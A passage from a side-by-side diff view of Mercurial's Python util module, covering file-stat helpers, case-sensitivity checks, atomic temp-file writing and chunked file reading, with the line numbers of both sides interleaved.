fp = posixfile(pathname, 'rb')

1760

fp = posixfile(pathname, 'rb')

1748

r = fp.read()

1761

r = fp.read()

1749

fp.close()

1762

fp.close()

1750

return r

1763

return r

1751

1764

1752

def fstat(fp):

1765

def fstat(fp):

1753

'''stat file object that may not have fileno method.'''

1766

'''stat file object that may not have fileno method.'''

1754

try:

1767

try:

1755

return os.fstat(fp.fileno())

1768

return os.fstat(fp.fileno())

1756

except AttributeError:

1769

except AttributeError:

1757

return os.stat(fp.name)

1770

return os.stat(fp.name)

1758

1771

1759

# File system features

1772

# File system features

1760

1773

1761

def fscasesensitive(path):

1774

def fscasesensitive(path):

1762

"""

1775

"""

1763

Return true if the given path is on a case-sensitive filesystem

1776

Return true if the given path is on a case-sensitive filesystem

1764

1777

1765

Requires a path (like /foo/.hg) ending with a foldable final

1778

Requires a path (like /foo/.hg) ending with a foldable final

1766

directory component.

1779

directory component.

1767

"""

1780

"""

1768

s1 = os.lstat(path)

1781

s1 = os.lstat(path)

1769

d, b = os.path.split(path)

1782

d, b = os.path.split(path)

1770

b2 = b.upper()

1783

b2 = b.upper()

1771

if b == b2:

1784

if b == b2:

1772

b2 = b.lower()

1785

b2 = b.lower()

1773

if b == b2:

1786

if b == b2:

1774

return True # no evidence against case sensitivity

1787

return True # no evidence against case sensitivity

1775

p2 = os.path.join(d, b2)

1788

p2 = os.path.join(d, b2)

1776

try:

1789

try:

1777

s2 = os.lstat(p2)

1790

s2 = os.lstat(p2)

1778

if s2 == s1:

1791

if s2 == s1:

1779

return False

1792

return False

1780

return True

1793

return True

1781

except OSError:

1794

except OSError:

1782

return True

1795

return True

1783

1796

1784

try:

1797

try:

1785

import re2

1798

import re2

1786

_re2 = None

1799

_re2 = None

1787

except ImportError:

1800

except ImportError:

1788

_re2 = False

1801

_re2 = False

1789

1802

1790

class _re(object):

1803

class _re(object):

1791

def _checkre2(self):

1804

def _checkre2(self):

1792

global _re2

1805

global _re2

1793

try:

1806

try:

1794

# check if match works, see issue3964

1807

# check if match works, see issue3964

1795

_re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))

1808

_re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))

1796

except ImportError:

1809

except ImportError:

1797

_re2 = False

1810

_re2 = False

1798

1811

1799

def compile(self, pat, flags=0):

1812

def compile(self, pat, flags=0):

1800

'''Compile a regular expression, using re2 if possible

1813

'''Compile a regular expression, using re2 if possible

1801

1814

1802

For best performance, use only re2-compatible regexp features. The

1815

For best performance, use only re2-compatible regexp features. The

1803

only flags from the re module that are re2-compatible are

1816

only flags from the re module that are re2-compatible are

1804

IGNORECASE and MULTILINE.'''

1817

IGNORECASE and MULTILINE.'''

1805

if _re2 is None:

1818

if _re2 is None:

1806

self._checkre2()

1819

self._checkre2()

1807

if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:

1820

if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:

1808

if flags & remod.IGNORECASE:

1821

if flags & remod.IGNORECASE:

1809

pat = '(?i)' + pat

1822

pat = '(?i)' + pat

1810

if flags & remod.MULTILINE:

1823

if flags & remod.MULTILINE:

1811

pat = '(?m)' + pat

1824

pat = '(?m)' + pat

1812

try:

1825

try:

1813

return re2.compile(pat)

1826

return re2.compile(pat)

1814

except re2.error:

1827

except re2.error:

1815

pass

1828

pass

1816

return remod.compile(pat, flags)

1829

return remod.compile(pat, flags)

1817

1830

1818

@propertycache

1831

@propertycache

1819

def escape(self):

1832

def escape(self):

1820

'''Return the version of escape corresponding to self.compile.

1833

'''Return the version of escape corresponding to self.compile.

1821

1834

1822

This is imperfect because whether re2 or re is used for a particular

1835

This is imperfect because whether re2 or re is used for a particular

1823

function depends on the flags, etc, but it's the best we can do.

1836

function depends on the flags, etc, but it's the best we can do.

1824

'''

1837

'''

1825

global _re2

1838

global _re2

1826

if _re2 is None:

1839

if _re2 is None:

1827

self._checkre2()

1840

self._checkre2()

1828

if _re2:

1841

if _re2:

1829

return re2.escape

1842

return re2.escape

1830

else:

1843

else:

1831

return remod.escape

1844

return remod.escape

1832

1845

1833

re = _re()

1846

re = _re()

1834

1847

1835

_fspathcache = {}

1848

_fspathcache = {}

1836

def fspath(name, root):

1849

def fspath(name, root):

1837

'''Get name in the case stored in the filesystem

1850

'''Get name in the case stored in the filesystem

1838

1851

1839

The name should be relative to root, and be normcase-ed for efficiency.

1852

The name should be relative to root, and be normcase-ed for efficiency.

1840

1853

1841

Note that this function is unnecessary, and should not be

1854

Note that this function is unnecessary, and should not be

1842

called, for case-sensitive filesystems (simply because it's expensive).

1855

called, for case-sensitive filesystems (simply because it's expensive).

1843

1856

1844

The root should be normcase-ed, too.

1857

The root should be normcase-ed, too.

1845

'''

1858

'''

1846

def _makefspathcacheentry(dir):

1859

def _makefspathcacheentry(dir):

1847

return dict((normcase(n), n) for n in os.listdir(dir))

1860

return dict((normcase(n), n) for n in os.listdir(dir))

1848

1861

1849

seps = pycompat.ossep

1862

seps = pycompat.ossep

1850

if pycompat.osaltsep:

1863

if pycompat.osaltsep:

1851

seps = seps + pycompat.osaltsep

1864

seps = seps + pycompat.osaltsep

1852

# Protect backslashes. This gets silly very quickly.

1865

# Protect backslashes. This gets silly very quickly.

1853

seps.replace('\\','\\\\')

1866

seps.replace('\\','\\\\')

1854

pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))

1867

pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))

1855

dir = os.path.normpath(root)

1868

dir = os.path.normpath(root)

1856

result = []

1869

result = []

1857

for part, sep in pattern.findall(name):

1870

for part, sep in pattern.findall(name):

1858

if sep:

1871

if sep:

1859

result.append(sep)

1872

result.append(sep)

1860

continue

1873

continue

1861

1874

1862

if dir not in _fspathcache:

1875

if dir not in _fspathcache:

1863

_fspathcache[dir] = _makefspathcacheentry(dir)

1876

_fspathcache[dir] = _makefspathcacheentry(dir)

1864

contents = _fspathcache[dir]

1877

contents = _fspathcache[dir]

1865

1878

1866

found = contents.get(part)

1879

found = contents.get(part)

1867

if not found:

1880

if not found:

1868

# retry "once per directory" per "dirstate.walk" which

1881

# retry "once per directory" per "dirstate.walk" which

1869

# may take place for each patches of "hg qpush", for example

1882

# may take place for each patches of "hg qpush", for example

1870

_fspathcache[dir] = contents = _makefspathcacheentry(dir)

1883

_fspathcache[dir] = contents = _makefspathcacheentry(dir)

1871

found = contents.get(part)

1884

found = contents.get(part)

1872

1885

1873

result.append(found or part)

1886

result.append(found or part)

1874

dir = os.path.join(dir, part)

1887

dir = os.path.join(dir, part)

1875

1888

1876

return ''.join(result)

1889

return ''.join(result)

1877

1890

1878

def checknlink(testfile):

1891

def checknlink(testfile):

1879

'''check whether hardlink count reporting works properly'''

1892

'''check whether hardlink count reporting works properly'''

1880

1893

1881

# testfile may be open, so we need a separate file for checking to

1894

# testfile may be open, so we need a separate file for checking to

1882

# work around issue2543 (or testfile may get lost on Samba shares)

1895

# work around issue2543 (or testfile may get lost on Samba shares)

1883

f1, f2, fp = None, None, None

1896

f1, f2, fp = None, None, None

1884

try:

1897

try:

1885

fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),

1898

fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),

1886

suffix='1~', dir=os.path.dirname(testfile))

1899

suffix='1~', dir=os.path.dirname(testfile))

1887

os.close(fd)

1900

os.close(fd)

1888

f2 = '%s2~' % f1[:-2]

1901

f2 = '%s2~' % f1[:-2]

1889

1902

1890

oslink(f1, f2)

1903

oslink(f1, f2)

1891

# nlinks() may behave differently for files on Windows shares if

1904

# nlinks() may behave differently for files on Windows shares if

1892

# the file is open.

1905

# the file is open.

1893

fp = posixfile(f2)

1906

fp = posixfile(f2)

1894

return nlinks(f2) > 1

1907

return nlinks(f2) > 1

1895

except OSError:

1908

except OSError:

1896

return False

1909

return False

1897

finally:

1910

finally:

1898

if fp is not None:

1911

if fp is not None:

1899

fp.close()

1912

fp.close()

1900

for f in (f1, f2):

1913

for f in (f1, f2):

1901

try:

1914

try:

1902

if f is not None:

1915

if f is not None:

1903

os.unlink(f)

1916

os.unlink(f)

1904

except OSError:

1917

except OSError:

1905

pass

1918

pass

1906

1919

1907

def endswithsep(path):

1920

def endswithsep(path):

1908

'''Check path ends with os.sep or os.altsep.'''

1921

'''Check path ends with os.sep or os.altsep.'''

1909

return (path.endswith(pycompat.ossep)

1922

return (path.endswith(pycompat.ossep)

1910

or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

1923

or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

1911

1924

1912

def splitpath(path):

1925

def splitpath(path):

1913

'''Split path by os.sep.

1926

'''Split path by os.sep.

1914

Note that this function does not use os.altsep because this is

1927

Note that this function does not use os.altsep because this is

1915

an alternative of simple "xxx.split(os.sep)".

1928

an alternative of simple "xxx.split(os.sep)".

1916

It is recommended to use os.path.normpath() before using this

1929

It is recommended to use os.path.normpath() before using this

1917

function if need.'''

1930

function if need.'''

1918

return path.split(pycompat.ossep)

1931

return path.split(pycompat.ossep)

1919

1932

1920

def mktempcopy(name, emptyok=False, createmode=None):

1933

def mktempcopy(name, emptyok=False, createmode=None):

1921

"""Create a temporary file with the same contents from name

1934

"""Create a temporary file with the same contents from name

1922

1935

1923

The permission bits are copied from the original file.

1936

The permission bits are copied from the original file.

1924

1937

1925

If the temporary file is going to be truncated immediately, you

1938

If the temporary file is going to be truncated immediately, you

1926

can use emptyok=True as an optimization.

1939

can use emptyok=True as an optimization.

1927

1940

1928

Returns the name of the temporary file.

1941

Returns the name of the temporary file.

1929

"""

1942

"""

1930

d, fn = os.path.split(name)

1943

d, fn = os.path.split(name)

1931

fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)

1944

fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)

1932

os.close(fd)

1945

os.close(fd)

1933

# Temporary files are created with mode 0600, which is usually not

1946

# Temporary files are created with mode 0600, which is usually not

1934

# what we want. If the original file already exists, just copy

1947

# what we want. If the original file already exists, just copy

1935

# its mode. Otherwise, manually obey umask.

1948

# its mode. Otherwise, manually obey umask.

1936

copymode(name, temp, createmode)

1949

copymode(name, temp, createmode)

1937

if emptyok:

1950

if emptyok:

1938

return temp

1951

return temp

1939

try:

1952

try:

1940

try:

1953

try:

1941

ifp = posixfile(name, "rb")

1954

ifp = posixfile(name, "rb")

1942

except IOError as inst:

1955

except IOError as inst:

1943

if inst.errno == errno.ENOENT:

1956

if inst.errno == errno.ENOENT:

1944

return temp

1957

return temp

1945

if not getattr(inst, 'filename', None):

1958

if not getattr(inst, 'filename', None):

1946

inst.filename = name

1959

inst.filename = name

1947

raise

1960

raise

1948

ofp = posixfile(temp, "wb")

1961

ofp = posixfile(temp, "wb")

1949

for chunk in filechunkiter(ifp):

1962

for chunk in filechunkiter(ifp):

1950

ofp.write(chunk)

1963

ofp.write(chunk)

1951

ifp.close()

1964

ifp.close()

1952

ofp.close()

1965

ofp.close()

1953

except: # re-raises

1966

except: # re-raises

1954

try:

1967

try:

1955

os.unlink(temp)

1968

os.unlink(temp)

1956

except OSError:

1969

except OSError:

1957

pass

1970

pass

1958

raise

1971

raise

1959

return temp

1972

return temp

1960

1973

1961

class filestat(object):

1974

class filestat(object):

1962

"""help to exactly detect change of a file

1975

"""help to exactly detect change of a file

1963

1976

1964

'stat' attribute is result of 'os.stat()' if specified 'path'

1977

'stat' attribute is result of 'os.stat()' if specified 'path'

1965

exists. Otherwise, it is None. This can avoid preparative

1978

exists. Otherwise, it is None. This can avoid preparative

1966

'exists()' examination on client side of this class.

1979

'exists()' examination on client side of this class.

1967

"""

1980

"""

1968

def __init__(self, stat):

1981

def __init__(self, stat):

1969

self.stat = stat

1982

self.stat = stat

1970

1983

1971

@classmethod

1984

@classmethod

1972

def frompath(cls, path):

1985

def frompath(cls, path):

1973

try:

1986

try:

1974

stat = os.stat(path)

1987

stat = os.stat(path)

1975

except OSError as err:

1988

except OSError as err:

1976

if err.errno != errno.ENOENT:

1989

if err.errno != errno.ENOENT:

1977

raise

1990

raise

1978

stat = None

1991

stat = None

1979

return cls(stat)

1992

return cls(stat)

1980

1993

1981

@classmethod

1994

@classmethod

1982

def fromfp(cls, fp):

1995

def fromfp(cls, fp):

1983

stat = os.fstat(fp.fileno())

1996

stat = os.fstat(fp.fileno())

1984

return cls(stat)

1997

return cls(stat)

1985

1998

1986

__hash__ = object.__hash__

1999

__hash__ = object.__hash__

1987

2000

1988

def __eq__(self, old):

2001

def __eq__(self, old):

1989

try:

2002

try:

1990

# if ambiguity between stat of new and old file is

2003

# if ambiguity between stat of new and old file is

1991

# avoided, comparison of size, ctime and mtime is enough

2004

# avoided, comparison of size, ctime and mtime is enough

1992

# to exactly detect change of a file regardless of platform

2005

# to exactly detect change of a file regardless of platform

1993

return (self.stat.st_size == old.stat.st_size and

2006

return (self.stat.st_size == old.stat.st_size and

1994

self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and

2007

self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and

1995

self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])

2008

self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])

1996

except AttributeError:

2009

except AttributeError:

1997

pass

2010

pass

1998

try:

2011

try:

1999

return self.stat is None and old.stat is None

2012

return self.stat is None and old.stat is None

2000

except AttributeError:

2013

except AttributeError:

2001

return False

2014

return False

2002

2015

2003

def isambig(self, old):

2016

def isambig(self, old):

2004

"""Examine whether new (= self) stat is ambiguous against old one

2017

"""Examine whether new (= self) stat is ambiguous against old one

2005

2018

2006

"S[N]" below means stat of a file at N-th change:

2019

"S[N]" below means stat of a file at N-th change:

2007

2020

2008

- S[n-1].ctime < S[n].ctime: can detect change of a file

2021

- S[n-1].ctime < S[n].ctime: can detect change of a file

2009

- S[n-1].ctime == S[n].ctime

2022

- S[n-1].ctime == S[n].ctime

2010

- S[n-1].ctime < S[n].mtime: means natural advancing (*1)

2023

- S[n-1].ctime < S[n].mtime: means natural advancing (*1)

2011

- S[n-1].ctime == S[n].mtime: is ambiguous (*2)

2024

- S[n-1].ctime == S[n].mtime: is ambiguous (*2)

2012

- S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)

2025

- S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)

2013

- S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)

2026

- S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)

2014

2027

2015

Case (*2) above means that a file was changed twice or more at

2028

Case (*2) above means that a file was changed twice or more at

2016

same time in sec (= S[n-1].ctime), and comparison of timestamp

2029

same time in sec (= S[n-1].ctime), and comparison of timestamp

2017

is ambiguous.

2030

is ambiguous.

2018

2031

2019

Base idea to avoid such ambiguity is "advance mtime 1 sec, if

2032

Base idea to avoid such ambiguity is "advance mtime 1 sec, if

2020

timestamp is ambiguous".

2033

timestamp is ambiguous".

2021

2034

2022

But advancing mtime only in case (*2) doesn't work as

2035

But advancing mtime only in case (*2) doesn't work as

2023

expected, because naturally advanced S[n].mtime in case (*1)

2036

expected, because naturally advanced S[n].mtime in case (*1)

2024

might be equal to manually advanced S[n-1 or earlier].mtime.

2037

might be equal to manually advanced S[n-1 or earlier].mtime.

2025

2038

2026

Therefore, all "S[n-1].ctime == S[n].ctime" cases should be

2039

Therefore, all "S[n-1].ctime == S[n].ctime" cases should be

2027

treated as ambiguous regardless of mtime, to avoid overlooking

2040

treated as ambiguous regardless of mtime, to avoid overlooking

2028

by confliction between such mtime.

2041

by confliction between such mtime.

2029

2042

2030

Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=

2043

Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=

2031

S[n].mtime", even if size of a file isn't changed.

2044

S[n].mtime", even if size of a file isn't changed.

2032

"""

2045

"""

2033

try:

2046

try:

2034

return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])

2047

return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])

2035

except AttributeError:

2048

except AttributeError:

2036

return False

2049

return False

2037

2050

2038

def avoidambig(self, path, old):

2051

def avoidambig(self, path, old):

2039

"""Change file stat of specified path to avoid ambiguity

2052

"""Change file stat of specified path to avoid ambiguity

2040

2053

2041

'old' should be previous filestat of 'path'.

2054

'old' should be previous filestat of 'path'.

2042

2055

2043

This skips avoiding ambiguity, if a process doesn't have

2056

This skips avoiding ambiguity, if a process doesn't have

2044

appropriate privileges for 'path'. This returns False in this

2057

appropriate privileges for 'path'. This returns False in this

2045

case.

2058

case.

2046

2059

2047

Otherwise, this returns True, as "ambiguity is avoided".

2060

Otherwise, this returns True, as "ambiguity is avoided".

2048

"""

2061

"""

2049

advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff

2062

advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff

2050

try:

2063

try:

2051

os.utime(path, (advanced, advanced))

2064

os.utime(path, (advanced, advanced))

2052

except OSError as inst:

2065

except OSError as inst:

2053

if inst.errno == errno.EPERM:

2066

if inst.errno == errno.EPERM:

2054

# utime() on the file created by another user causes EPERM,

2067

# utime() on the file created by another user causes EPERM,

2055

# if a process doesn't have appropriate privileges

2068

# if a process doesn't have appropriate privileges

2056

return False

2069

return False

2057

raise

2070

raise

2058

return True

2071

return True

2059

2072

2060

def __ne__(self, other):

2073

def __ne__(self, other):

2061

return not self == other

2074

return not self == other

2062

2075

2063

class atomictempfile(object):

2076

class atomictempfile(object):

2064

'''writable file object that atomically updates a file

2077

'''writable file object that atomically updates a file

2065

2078

2066

All writes will go to a temporary copy of the original file. Call

2079

All writes will go to a temporary copy of the original file. Call

2067

close() when you are done writing, and atomictempfile will rename

2080

close() when you are done writing, and atomictempfile will rename

2068

the temporary copy to the original name, making the changes

2081

the temporary copy to the original name, making the changes

2069

visible. If the object is destroyed without being closed, all your

2082

visible. If the object is destroyed without being closed, all your

2070

writes are discarded.

2083

writes are discarded.

2071

2084

2072

checkambig argument of constructor is used with filestat, and is

2085

checkambig argument of constructor is used with filestat, and is

2073

useful only if target file is guarded by any lock (e.g. repo.lock

2086

useful only if target file is guarded by any lock (e.g. repo.lock

2074

or repo.wlock).

2087

or repo.wlock).

2075

'''

2088

'''

2076

def __init__(self, name, mode='w+b', createmode=None, checkambig=False):

2089

def __init__(self, name, mode='w+b', createmode=None, checkambig=False):

2077

self.__name = name # permanent name

2090

self.__name = name # permanent name

2078

self._tempname = mktempcopy(name, emptyok=('w' in mode),

2091

self._tempname = mktempcopy(name, emptyok=('w' in mode),

2079

createmode=createmode)

2092

createmode=createmode)

2080

self._fp = posixfile(self._tempname, mode)

2093

self._fp = posixfile(self._tempname, mode)

2081

self._checkambig = checkambig

2094

self._checkambig = checkambig

2082

2095

2083

# delegated methods

2096

# delegated methods

2084

self.read = self._fp.read

2097

self.read = self._fp.read

2085

self.write = self._fp.write

2098

self.write = self._fp.write

2086

self.seek = self._fp.seek

2099

self.seek = self._fp.seek

2087

self.tell = self._fp.tell

2100

self.tell = self._fp.tell

2088

self.fileno = self._fp.fileno

2101

self.fileno = self._fp.fileno

2089

2102

2090

def close(self):

2103

def close(self):

2091

if not self._fp.closed:

2104

if not self._fp.closed:

2092

self._fp.close()

2105

self._fp.close()

2093

filename = localpath(self.__name)

2106

filename = localpath(self.__name)

2094

oldstat = self._checkambig and filestat.frompath(filename)

2107

oldstat = self._checkambig and filestat.frompath(filename)

2095

if oldstat and oldstat.stat:

2108

if oldstat and oldstat.stat:

2096

rename(self._tempname, filename)

2109

rename(self._tempname, filename)

2097

newstat = filestat.frompath(filename)

2110

newstat = filestat.frompath(filename)

2098

if newstat.isambig(oldstat):

2111

if newstat.isambig(oldstat):

2099

# stat of changed file is ambiguous to original one

2112

# stat of changed file is ambiguous to original one

2100

advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff

2113

advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff

2101

os.utime(filename, (advanced, advanced))

2114

os.utime(filename, (advanced, advanced))

2102

else:

2115

else:

2103

rename(self._tempname, filename)

2116

rename(self._tempname, filename)

2104

2117

2105

def discard(self):

2118

def discard(self):

2106

if not self._fp.closed:

2119

if not self._fp.closed:

2107

try:

2120

try:

2108

os.unlink(self._tempname)

2121

os.unlink(self._tempname)

2109

except OSError:

2122

except OSError:

2110

pass

2123

pass

2111

self._fp.close()

2124

self._fp.close()

2112

2125

2113

def __del__(self):

2126

def __del__(self):

2114

if safehasattr(self, '_fp'): # constructor actually did something

2127

if safehasattr(self, '_fp'): # constructor actually did something

2115

self.discard()

2128

self.discard()

2116

2129

2117

def __enter__(self):

2130

def __enter__(self):

2118

return self

2131

return self

2119

2132

2120

def __exit__(self, exctype, excvalue, traceback):

2133

def __exit__(self, exctype, excvalue, traceback):

2121

if exctype is not None:

2134

if exctype is not None:

2122

self.discard()

2135

self.discard()

2123

else:

2136

else:

2124

self.close()

2137

self.close()

2125

2138

2126

def unlinkpath(f, ignoremissing=False, rmdir=True):

2139

def unlinkpath(f, ignoremissing=False, rmdir=True):

2127

"""unlink and remove the directory if it is empty"""

2140

"""unlink and remove the directory if it is empty"""

2128

if ignoremissing:

2141

if ignoremissing:

2129

tryunlink(f)

2142

tryunlink(f)

2130

else:

2143

else:

2131

unlink(f)

2144

unlink(f)

2132

if rmdir:

2145

if rmdir:

2133

# try removing directories that might now be empty

2146

# try removing directories that might now be empty

2134

try:

2147

try:

2135

removedirs(os.path.dirname(f))

2148

removedirs(os.path.dirname(f))

2136

except OSError:

2149

except OSError:

2137

pass

2150

pass

2138

2151

2139

def tryunlink(f):

2152

def tryunlink(f):

2140

"""Attempt to remove a file, ignoring ENOENT errors."""

2153

"""Attempt to remove a file, ignoring ENOENT errors."""

2141

try:

2154

try:

2142

unlink(f)

2155

unlink(f)

2143

except OSError as e:

2156

except OSError as e:

2144

if e.errno != errno.ENOENT:

2157

if e.errno != errno.ENOENT:

2145

raise

2158

raise

2146

2159

2147

def makedirs(name, mode=None, notindexed=False):

2160

def makedirs(name, mode=None, notindexed=False):

2148

"""recursive directory creation with parent mode inheritance

2161

"""recursive directory creation with parent mode inheritance

2149

2162

2150

Newly created directories are marked as "not to be indexed by

2163

Newly created directories are marked as "not to be indexed by

2151

the content indexing service", if ``notindexed`` is specified

2164

the content indexing service", if ``notindexed`` is specified

2152

for "write" mode access.

2165

for "write" mode access.

2153

"""

2166

"""

2154

try:

2167

try:

2155

makedir(name, notindexed)

2168

makedir(name, notindexed)

2156

except OSError as err:

2169

except OSError as err:

2157

if err.errno == errno.EEXIST:

2170

if err.errno == errno.EEXIST:

2158

return

2171

return

2159

if err.errno != errno.ENOENT or not name:

2172

if err.errno != errno.ENOENT or not name:

2160

raise

2173

raise

2161

parent = os.path.dirname(os.path.abspath(name))

2174

parent = os.path.dirname(os.path.abspath(name))

2162

if parent == name:

2175

if parent == name:

2163

raise

2176

raise

2164

makedirs(parent, mode, notindexed)

2177

makedirs(parent, mode, notindexed)

2165

try:

2178

try:

2166

makedir(name, notindexed)

2179

makedir(name, notindexed)

2167

except OSError as err:

2180

except OSError as err:

2168

# Catch EEXIST to handle races

2181

# Catch EEXIST to handle races

2169

if err.errno == errno.EEXIST:

2182

if err.errno == errno.EEXIST:

2170

return

2183

return

2171

raise

2184

raise

2172

if mode is not None:

2185

if mode is not None:

2173

os.chmod(name, mode)

2186

os.chmod(name, mode)

2174

2187

2175

def readfile(path):

2188

def readfile(path):

2176

with open(path, 'rb') as fp:

2189

with open(path, 'rb') as fp:

2177

return fp.read()

2190

return fp.read()

2178

2191

2179

def writefile(path, text):

2192

def writefile(path, text):

2180

with open(path, 'wb') as fp:

2193

with open(path, 'wb') as fp:

2181

fp.write(text)

2194

fp.write(text)

2182

2195

2183

def appendfile(path, text):

2196

def appendfile(path, text):

2184

with open(path, 'ab') as fp:

2197

with open(path, 'ab') as fp:

2185

fp.write(text)

2198

fp.write(text)

2186

2199

2187

class chunkbuffer(object):

2200

class chunkbuffer(object):

2188

"""Allow arbitrary sized chunks of data to be efficiently read from an

2201

"""Allow arbitrary sized chunks of data to be efficiently read from an

2189

iterator over chunks of arbitrary size."""

2202

iterator over chunks of arbitrary size."""

2190

2203

2191

def __init__(self, in_iter):

2204

def __init__(self, in_iter):

2192

"""in_iter is the iterator that's iterating over the input chunks."""

2205

"""in_iter is the iterator that's iterating over the input chunks."""

2193

def splitbig(chunks):

2206

def splitbig(chunks):

2194

for chunk in chunks:

2207

for chunk in chunks:

2195

if len(chunk) > 2**20:

2208

if len(chunk) > 2**20:

2196

pos = 0

2209

pos = 0

2197

while pos < len(chunk):

2210

while pos < len(chunk):

2198

end = pos + 2 ** 18

2211

end = pos + 2 ** 18

2199

yield chunk[pos:end]

2212

yield chunk[pos:end]

2200

pos = end

2213

pos = end

2201

else:

2214

else:

2202

yield chunk

2215

yield chunk

2203

self.iter = splitbig(in_iter)

2216

self.iter = splitbig(in_iter)

2204

self._queue = collections.deque()

2217

self._queue = collections.deque()

2205

self._chunkoffset = 0

2218

self._chunkoffset = 0

2206

2219

2207

def read(self, l=None):

2220

def read(self, l=None):

2208

"""Read L bytes of data from the iterator of chunks of data.

2221

"""Read L bytes of data from the iterator of chunks of data.

2209

Returns less than L bytes if the iterator runs dry.

2222

Returns less than L bytes if the iterator runs dry.

2210

2223

2211

If size parameter is omitted, read everything"""

2224

If size parameter is omitted, read everything"""

2212

if l is None:

2225

if l is None:

2213

return ''.join(self.iter)

2226

return ''.join(self.iter)

2214

2227

2215

left = l

2228

left = l

2216

buf = []

2229

buf = []

2217

queue = self._queue

2230

queue = self._queue

2218

while left > 0:

2231

while left > 0:

2219

# refill the queue

2232

# refill the queue

2220

if not queue:

2233

if not queue:

2221

target = 2**18

2234

target = 2**18

2222

for chunk in self.iter:

2235

for chunk in self.iter:

2223

queue.append(chunk)

2236

queue.append(chunk)

2224

target -= len(chunk)

2237

target -= len(chunk)

2225

if target <= 0:

2238

if target <= 0:

2226

break

2239

break

2227

if not queue:

2240

if not queue:

2228

break

2241

break

2229

2242

2230

# The easy way to do this would be to queue.popleft(), modify the

2243

# The easy way to do this would be to queue.popleft(), modify the

2231

# chunk (if necessary), then queue.appendleft(). However, for cases

2244

# chunk (if necessary), then queue.appendleft(). However, for cases

2232

# where we read partial chunk content, this incurs 2 dequeue

2245

# where we read partial chunk content, this incurs 2 dequeue

2233

# mutations and creates a new str for the remaining chunk in the

2246

# mutations and creates a new str for the remaining chunk in the

2234

# queue. Our code below avoids this overhead.

2247

# queue. Our code below avoids this overhead.

2235

2248

2236

chunk = queue[0]

2249

chunk = queue[0]

2237

chunkl = len(chunk)

2250

chunkl = len(chunk)

2238

offset = self._chunkoffset

2251

offset = self._chunkoffset

2239

2252

2240

# Use full chunk.

2253

# Use full chunk.

2241

if offset == 0 and left >= chunkl:

2254

if offset == 0 and left >= chunkl:

2242

left -= chunkl

2255

left -= chunkl

2243

queue.popleft()

2256

queue.popleft()

2244

buf.append(chunk)

2257

buf.append(chunk)

2245

# self._chunkoffset remains at 0.

2258

# self._chunkoffset remains at 0.

2246

continue

2259

continue

2247

2260

2248

chunkremaining = chunkl - offset

2261

chunkremaining = chunkl - offset

2249

2262

2250

# Use all of unconsumed part of chunk.

2263

# Use all of unconsumed part of chunk.

2251

if left >= chunkremaining:

2264

if left >= chunkremaining:

2252

left -= chunkremaining

2265

left -= chunkremaining

2253

queue.popleft()

2266

queue.popleft()

2254

# offset == 0 is enabled by block above, so this won't merely

2267

# offset == 0 is enabled by block above, so this won't merely

2255

# copy via ``chunk[0:]``.

2268

# copy via ``chunk[0:]``.

2256

buf.append(chunk[offset:])

2269

buf.append(chunk[offset:])

2257

self._chunkoffset = 0

2270

self._chunkoffset = 0

2258

2271

2259

# Partial chunk needed.

2272

# Partial chunk needed.

2260

else:

2273

else:

2261

buf.append(chunk[offset:offset + left])

2274

buf.append(chunk[offset:offset + left])

2262

self._chunkoffset += left

2275

self._chunkoffset += left

2263

left -= chunkremaining

2276

left -= chunkremaining

2264

2277

2265

return ''.join(buf)

2278

return ''.join(buf)

2266

2279

2267

def filechunkiter(f, size=131072, limit=None):

2280

def filechunkiter(f, size=131072, limit=None):

2268

"""Create a generator that produces the data in the file size

2281

"""Create a generator that produces the data in the file size

2269

(default 131072) bytes at a time, up to optional limit (default is

2282

(default 131072) bytes at a time, up to optional limit (default is

2270

to read all data). Chunks may be less than size bytes if the

2283

to read all data). Chunks may be less than size bytes if the

2271

chunk is the last chunk in the file, or the file is a socket or

2284

chunk is the last chunk in the file, or the file is a socket or

2272

some other type of file that sometimes reads less data than is

2285

some other type of file that sometimes reads less data than is

2273

requested."""

2286

requested."""

2274

assert size >= 0

2287

assert size >= 0

2275

assert limit is None or limit >= 0

2288

assert limit is None or limit >= 0

2276

while True:

2289

while True:

2277

if limit is None:

2290

if limit is None:

2278

nbytes = size

2291

nbytes = size

2279

else:

2292

else:

2280

nbytes = min(limit, size)

2293

nbytes = min(limit, size)

2281

s = nbytes and f.read(nbytes)

2294

s = nbytes and f.read(nbytes)

2282

if not s:

2295

if not s:

2283

break

2296

break

2284

if limit:

2297

if limit:

2285

limit -= len(s)

2298

limit -= len(s)

2286

yield s

2299

yield s

2287

2300

2288

class cappedreader(object):

2301

class cappedreader(object):

2289

"""A file object proxy that allows reading up to N bytes.

2302

"""A file object proxy that allows reading up to N bytes.

2290

2303

2291

Given a source file object, instances of this type allow reading up to

2304

Given a source file object, instances of this type allow reading up to

2292

N bytes from that source file object. Attempts to read past the allowed

2305

N bytes from that source file object. Attempts to read past the allowed

2293

